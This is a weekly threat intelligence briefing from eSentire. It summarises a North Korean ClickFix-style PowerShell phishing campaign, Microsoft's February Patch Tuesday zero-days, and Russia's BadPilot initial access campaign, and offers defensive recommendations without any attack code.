eSentire's Threat Response Unit (TRU) compiles the following weekly intelligence overview, providing cybersecurity leaders with expert analysis and insights on the most important events of the past week along with important security tips.
Recent Threat Intelligence Advisories
Noteworthy News
North Korean Threat Actors using Phishing Techniques to Execute PowerShell Commands
Bottom Line: North Korean threat actors are using a phishing technique similar to the ClickFix initial access vector, which uses social engineering to convince victims to execute malicious PowerShell code.
On February 11th, Microsoft Threat Intelligence Team reported a new phishing tactic leveraged by the North Korean state-sponsored threat group Emerald Street.
Emerald Street, also known as Kimsuky, Velvet Chollima, Black Banshee, and THALLIUM, is a North Korean state-sponsored cyber espionage group active since at least 2012. Initially focused on targeting South Korean government agencies, think tanks, and experts in various sectors, the group has since broadened its scope to include organizations in the United States, Japan, Russia, and Europe. Emerald Street has a history of targeting defense-related organizations, using tactics such as offering fake job opportunities to employees and luring them into revealing sensitive information.
In a recent phishing campaign, the attackers impersonated South Korean government officials. After establishing trust and rapport with their targets, the threat actors sent spear-phishing emails that included a PDF attachment and a URL. The email instructed the victim to click the URL to register their device to access the provided documents. The instructions prompted the victim to open PowerShell as an administrator and paste the provided malicious code. If the code was run successfully as an administrator, it led to downloading and installing a browser-based remote desktop tool and a certificate file containing a hardcoded PIN from a remote server. The code is also responsible for sending a web request to a remote server and registering the victim's device using the previously downloaded certificate and PIN. The device registration allowed the attackers to access the victim's device and exfiltrate data.
Microsoft reported that they have observed the use of the tactic in limited attacks since January 2025. The attack tactic described follows an approach similar to the ClickFix Initial Access Vector, where the victim is manipulated into executing malicious commands. Another North Korean threat actor linked to the Contagious Interview campaign used a similar strategy, where victims were prompted to copy and paste and then execute malicious commands on their Apple macOS systems. These commands were disguised as solutions to camera or microphone issues during the interview.
eSentire Threat Intelligence Analysis:
Although the use of the mentioned social engineering tactic has been in a limited number of attacks, its application, along with other Click-Fix style schemes where users execute malicious commands or scripts on their own systems, is expected to persist in 2025. This manipulation tactic enables attackers to gain access to victim devices with minimal suspicion, making it an appealing initial access method for cybercriminals.
Various threat actors utilize the Click-Fix technique via compromised websites, documents, HTML attachments, malicious URLs, and other methods. eSentire has noted a significant increase in Click-Fix attacks in recent months, where the tactic was used to distribute information-stealing malware, such as Lumma Stealer, Vidar Stealer, NetSupportManagerRAT, and more. To mitigate ClickFix and similar threats, it is recommended to disable the Windows Run Box, to prevent users from being able to run malicious PowerShell Code. Organizations should implement Endpoint Detection and Response (EDR) tools to monitor suspicious PowerShell activity and the deployment of malicious files. Organizations should conduct User Awareness Training to help users recognize and report phishing attacks effectively.
eSentire Threat Intelligence team is tracking emerging initial access tactics such as ClickFix. eSentire's Threat Response Unit (TRU) has published the following articles on ClickFix titled Lumma Stealer ClickFix Distribution, Lumma Stealer Malware Updated to Use ChaCha20 Cipher for Config Decryption and NetSupport RAT Clickfix Distribution.
Microsoft Patch Tuesday
Bottom Line: This month, Microsoft highlighted two vulnerabilities confirmed to be actively exploited by threat actors and two vulnerabilities that were disclosed prior to patch release. Organizations are strongly recommended to review the full Microsoft release and apply all relevant security patches.
On February 11th, Microsoft released their monthly Patch Tuesday vulnerability disclosure, which included a total of 55 vulnerabilities. The patches address two zero-day vulnerabilities that have been observed being actively exploited and two publicly disclosed vulnerabilities, one of which Microsoft has listed as exploitation “more likely”.
The confirmed exploited vulnerabilities are CVE-2025-21418 and CVE-2025-21391. CVE-2025-21418 (CVSS: 7.8) is described as a Windows Ancillary Function Driver Elevation of Privilege vulnerability. A threat actor with previously established access to a vulnerable device could exploit the vulnerability to establish system privileges. Multiple versions of Windows Server, Windows 10, and Windows 11 are impacted.
CVE-2025-21391 (CVSS: 7.1) is a Windows Elevation of Privilege vulnerability. Similar to the previously mentioned zero-day vulnerability, exploitation of CVE 2025-21391 would lead to increased privileges on the compromised device; threat actors would be able to delete targeted files on a system, potentially leading to services being unavailable. Microsoft has not shared any details on real-world attacks involving either vulnerability.
Microsoft states that two vulnerabilities from the February Patch Tuesday release were disclosed prior to patch release but have not yet been exploited by threat actors. CVE-2025-21194 (CVSS: 7.1) is a Surface Security Feature Bypass vulnerability. Successful exploitation would enable a threat actor with previously established access to a network to bypass the Unified Extensible Firmware Interface (UEFI) and potentially compromise the hypervisor and secure kernel. CVE-2025-21377 (CVSS: 6.5) is a Hash Disclosure Spoofing vulnerability, which may allow threat actors to steal a user’s NTLMv2 hash, allowing them to authenticate as the user. Microsoft states that this vulnerability is “more likely” to be exploited in real-world attacks.
eSentire Threat Intelligence Analysis:
Organizations are strongly encouraged to apply all relevant security patches released by Microsoft as part of their February Patch Tuesday disclosure. Zero-day vulnerabilities, vulnerabilities listed as exploitation more likely, and vulnerabilities in Internet-facing applications should be prioritized for immediate patching.
The 55 vulnerabilities from this release show a significant decrease from the January disclosure. Microsoft’s January Patch Tuesday release included 161 total vulnerabilities, eight of which were exploited as zero-days. February marks Microsoft’s lowest patch release since June 2024.
The eSentire Threat Intelligence team is actively tracking the vulnerabilities from this release for additional details and detection opportunities. Microsoft has not disclosed what researchers or organizations reported zero-day vulnerabilities from the February release, as such, it is unclear when additional details or technical reports for the vulnerabilities will be made available. eSentire Managed Vulnerability Service (MVS) has plugins in place to identify devices vulnerable to the recently disclosed zero-day vulnerabilities.
The BadPilot Campaign
Bottom Line: Microsoft revealed details on a multi-year initial access campaign attributed to the Russian state-sponsored APT Seashell Blizzard, who were observed exploiting known vulnerabilities in Internet-facing assets to gain access to victim networks and establish persistence on compromised hosts for espionage purposes.
On February 12th, Microsoft disclosed a multi-year initial access campaign that is attributed to a subgroup that operates with the known APT group Seashell Blizzard (Sandworm, BlackEnergy, APT44). This campaign is being tracked under the name BadPilot. Seashell Blizzard is highly sophisticated Russian state- sponsored APT that has operated since at least 2009.
The BadPilot campaign has been ongoing since at least 2021, and impacted organizations in the United States, Canada, Australia, and the United Kingdom. The Seashell Blizzard subgroup is specifically dedicated to gaining initial access into victim organizations and establishing persistence. Persistence mechanisms allow for the primary Seashell Blizzard threat actors to access victim organizations at a later date. For initial access into victim organizations, the group exploits vulnerabilities in Internet-facing assets. According to Microsoft, Microsoft Exchange, Zimbra Collaboration, OpenFire, JetBrains TeamCity, Microsoft Outlook, ConnectWise ScreenConnect, Fortinet FortiClient EMS, and JBOSS vulnerabilities have all been targeted.
Once access is established, a variety of different means are employed to maintain access to the device. These include the deployment of Remote Management and Monitoring (RMM) tools, such as the Atera Agent, use of OpenSSH with a unique public key, and the deployment of webshells. Additionally, Microsoft identified a previously unseen persistence mechanism dubbed ShadowLink. ShadowLink is a custom utility which registers compromised systems as TOR hidden services, enabling continuous access and stealthy Command-and-Control (C2). Microsoft has not shared information on Seashell Blizzard’s actioning of infections established by the subgroup.
eSentire Threat Intelligence Analysis:
Seashell Blizzard is directly attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455. From 2021-2023, the group’s activity was focused on “Ukraine, Europe, and specific verticals in Central and South Asia, and the Middle East”. Starting in early 2024, Seashell Blizzard shifted their targeting to the United States, Canada, Australia, and the United Kingdom. This change is notable, as it indicates shifting Russian strategic priorities towards members of the Five-Eyes intelligence alliance.
Microsoft describes Seashell Blizzard as “Russia’s cyber tip of the spear in Ukraine”. The subgroup explained in this report, compromises organizations that are, or may become, relevant to Russian strategic goals, enabling future access by the broader Seashell Blizzard group. While the specific goals of compromise have not been identified or disclosed at this time, Seashell Blizzard has previously carried out a wide variety of sophisticated attacks. These include information theft for strategic advantage, supply chain attacks to spread compromises, and destructive attacks involving both wiper malware and the manipulation of Industrial Control Systems (ICS). As the Seashell Blizzard initial access subgroup appears to compromise victims in Five-Eyes countries opportunistically, it is possible that there is not a specific goal for each infection at this time. In this scenario, compromised organizations would be reviewed, and evaluated for their potential strategic value by the primary group. Compromised organizations can be rapidly actioned at a future date, due to the established persistence mechanisms.
As Seashell Blizzard is a highly active, long-established, and sophisticated group, similar activity should be expected throughout 2025. It is almost certain that the group will continue to develop novel tools and attacks. In response to the disclosure of the BadPilot campaign, eSentire’s Threat Response Unit (TRU) is performing threat hunts across the client base. Additionally, known related IP addresses are blocked via the eSentire Global Block list. The eSentire product suite maintains a variety of detections for known Seashell Blizzard tools, including publicly available tools used by the group, such as CobaltStrike and the DarkCrystal (DC) RAT. eSentire Managed Vulnerability Service (MVS) has plugins in place to identify all of the vulnerabilities listed in this report. The TRU team at eSentire continues to research this topic for additional details and detection opportunities.
About the threat briefings:
The threat briefing is a weekly intelligence overview for non-technical users. The Threat Intelligence team at eSentire investigates, analyzes, and organizes the most important events of the past week along with important security tips and redistributes the findings for quick reading. The main goal of this briefing is to improve the overall awareness of readers regarding cyber security.
